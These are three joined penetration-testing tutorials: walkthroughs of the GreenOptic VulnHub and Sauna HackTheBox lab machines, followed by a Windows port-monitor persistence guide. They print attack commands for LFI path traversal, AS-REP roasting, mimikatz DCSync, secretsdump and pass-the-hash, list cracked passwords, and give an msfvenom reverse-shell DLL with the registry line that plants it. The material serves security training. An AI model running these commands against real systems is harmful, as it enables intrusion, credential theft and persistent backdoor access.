GreenOptic: 1 Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called "GreenOptic - 1".  It's available at VulnHub for penetration testing and you can download it from here.

The credit for making this lab goes to Thomas Williams. Let's get started and learn how to successfully break it down.

Level: Hard

Penetration Testing Methodology

Recognition

§  Netdiscover

§  Nmap

Enumeration

§  Gobuster

Exploiting

• Local File Inclusion Vulnerability (LFI)
• John The Ripper
• Wireshark

Privilege Escalation

§  Credential theft with network forensics

§  Abuse of Wireshark group

§  Capture the flag

Walkthrough

Recognition

We are looking for the machine IP with netdiscover

netdiscover

So, let's start by running map to all ports with OS detection, software versions, scripts and traceroute.

nmap  -A  -p-  192.168.10.160

Enumeration

We access the website and by visiting the different sections, we can list the name and surname of the CEO and other employees.

We enter the web service through port 10000 and see that it indicates a route that includes your domain name

We will configure our “/etc/hosts” file:

We open the web address websrv01.greenoptic.vm:10000 and find a control panel "Webmin". Although it seems interesting, we won't listen to it.

We used Gobuster to further investigate the first website, we found a directory called "account".

We access it and find an authentication system, but the variable "?include=cookiewarning" catches our attention.

Change "cookiewarning" to ".. /.. /.. /.. /.. /.. /.. /etc/passwd" and show that the application is vulnerable to LFI (Local File Inclusion).

Exploiting

We went through the DNS service with "dig" and listed a subdomain called "recoveryplan.greenoptic.vm". Strange, isn't it? A company that has backup!!

We introduce this subdomain to the file "/etc/hosts" and enter it from the web browser.

It asks for authentication, we try with "guessing" but without success.

This type of authentication is done through the ".htpasswd" file, taking advantage of the LFI vulnerability found above, we can load the file and read the encrypted credentials.

Using JohnTheRipper and the "rockyou" dictionary we managed to crack the hash and get the password in plain text.

We use the credentials to access the "phpBB" forum and view an administrator's post, which includes a ".zip" file containing "juicy" information.

They also mention that the "dpi.zip" file is password protected and that this has been sent to "Sam".

Again we use the LFI vulnerability and read the email from "Sam", we get the password to be able to unzip the file "dpi.zip".

We open the file "dpi.pcap" and analyzing it we find the credentials of the FTP service of the user "Alex".

We access via FTP and read the file "user.txt".

It tells us to try the same credentials to access through the SSH service, we connect through it and get access to the inside of the machine.

Privilege Escalation (root)

We check files and binaries we have access to, we check privileges and permissions and the only interesting thing is that we belong to the "wireshark" group.

We open wireshark and sniff all the traffic, we see that there is an attempt of authentication that happens frequently. We check the package in question and find some credentials in "base64".

We decode these credentials (password is: ASfojoj2eozxczzmedlmedASASDKoj3o), authenticate ourselves as "root" and read your flag.

HackTheBox Sauna Walkthrough

Introduction

Today we are going to solve a HTB machine named Sauna. Sauna is an easy difficulty Windows machine that features Active Directory enumeration and exploitation.

The credit for making this lab goes to egotisticalSW.

Level: Easy

Penetration Testing Methodology:

·      Recon

o   Nmap

·      Enumeration

o   Web application

o   username-anarchy

·      Exploitation (Initial Access)

o   AS-REP Roasting

o   john the ripper

o   evil-winrm

·      Privilege Escalation

o   winPEASx64.exe

o   bloodhound-python

o   DCSync

o   mimkatz.exe

o   impacket-secretsdump

o   Pass The Hash

o   Capture the Flag

 

Walkthrough

Recon

Starting the enumeration with port and service scan by running nmap.

nmap -sV 10.129.128.245

Nmap results suggests the Domain name as EGOTISTICAL-BANK.LOCAL

Enumeration

At port 80, there is a website running in which there is an About Us page containing the list of team members.

In order to create a list of users from the About Us page, username-anarchy tool was used which can be downloaded from: https://github.com/urbanadventurer/username-anarchy

Also, creating a username.txt file which contains all the team members' name.

Using the username.txt as input in the username-anarchy tool to generate a users.txt file which will comprises of all the names as first,last,first.last,flast format.

./username-anarchy --input-file username.txt --select-format first,last,first.last,flast > users.txt

Before starting any exploitation, performing the host entry in the /etc/hosts file for the target machine IP.

Exploitation

During the enumeration, it was observed that the port 88 i.e., Kerberos service port is open. The attacks related with the port 88 can be performed through this article : https://viperone.gitbook.io/pentest-everything/everything/ports/port-88-or-kerberos

So, the AS-REP roasting can be tried here.

AS-REP roasting is a technique that allows retrieving password hashes of users that have Do not require Kerberos preauthentication property selected.

Since we already have a list of users and the Kerberos service enabled, we will use the impacket-GetNPUsers script inside kali that will allow us to capture the users' hashes.

It can be seen that fsmith user's hash is obtained after successful AS-REP roasting attack.

impacket-GetNPUsers -dc-ip 10.129.128.245 EGOTISTICAL-BANK.LOCAL/ -usersfile users.txt

Copying the obtained hash into a file named hashes.

Cracking the above obtained hash using john the ripper tool.

john --wordlist=/usr/share/wordlists/rockyou.txt hashes

It can be seen that the password for the fsmith user is Thestrokes23.

Initial Access

The initial access can be taken by login into the target system using evil-winrm.

evil-winrm -I 10.129.128.245 -u fsmith -p Thestrokes23

Privilege Escalation

To perform privilege escalation, winPEASx64.exe is transferred into the target system using the upload command through evil-winrm.

Running the winPEASx64.exe after it is transferred.

Winpeas output showed a set of credentials for the domain user svc_loanmanager as Moneymakestheworldgoround!.

After login using the svc_loanmanager user, it was observed that there was a local user by the name svc_loanmgr. So tried using the same password for the svc_loanmgr user and it worked. Now to further enumerate, bloodhound can be used to map the Active Directory rights and permissions.

An overview of the Active Directory structure can be taken using the bloodhound-python script. The following command would generate the .json files which can be later imported into the Bloodhound (neo4j database) to analyse the results.

bloodhound-python -u svc_loanmgr -p 'Moneymakestheworldgoround!' -ns 10.129.128.245 -d EGOTISTICAL-BANK.LOCAL -c All

Starting the neo4j as console application,

 

Running the bloodhound and importing all the .json files.

It can be seen that the svc_loanmgr user had DCSync Rights on the Domain Controller. So, here DCSync attack can be performed which allows the user to request any user credentials from the domain.

The credentials can be dumped using mimikatz.exe or impacket-secretsdump script. Here we will be using both the methods, first starting with the mimikatz.exe.

After mimikatz.exe is transferred, running the following command:

./mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"

The above command can be used to dump the NTLM hash of the Administrator user.

Similar NTLM hash can be obtained using the impacket-secretsdump script.

The following command can be used to dump the hash:

impacket-secretsdump egotistical-bank/svc_loanmgr@10.129.128.245 -just-dc-user Administrator

Finally, the obtained hash can be used to login into the target system as Administrator using Pass the Hash attack.

evil-winrm can be used to perform the attack and login into the target system as Administrator.

 

Windows Persistence: Port Monitors

Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.

Mitre ID: T1547.010

Sub-technique of:  T1547

Let’s Check and try to perform this attack

Generate DLL Payload

In order to launch dll persistence attack, you need to execute following command which will generate a malicous dll payload.

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.112 lport=4444 -f dll > raj.dll

Inject DLL Payload

Now inject malicious dll file into victim’s machine inside /system32 through your meterpreter session with admin privilege and then execute following command to make changes into register for printer driver installation.

upload /root/raj.dll

reg add "hklm\system\currentcontrolset\control\print\monitors\ignite" /v "Driver" /d "raj.dll" /t REG_SZ

As you can see in the given below image that we have successfully changed the registry key.

Maintain Access

Now, in future when the attack will launch the listener for obtaining a reverse connection. So, as soon as the victims machine get reboots the .dll file get active and the attacker will get meterpreter session due to Monitor DLLs that are loaded by spoolsv.exe for DLLs.

Reference: https://attack.mitre.org/techniques/T1547/010/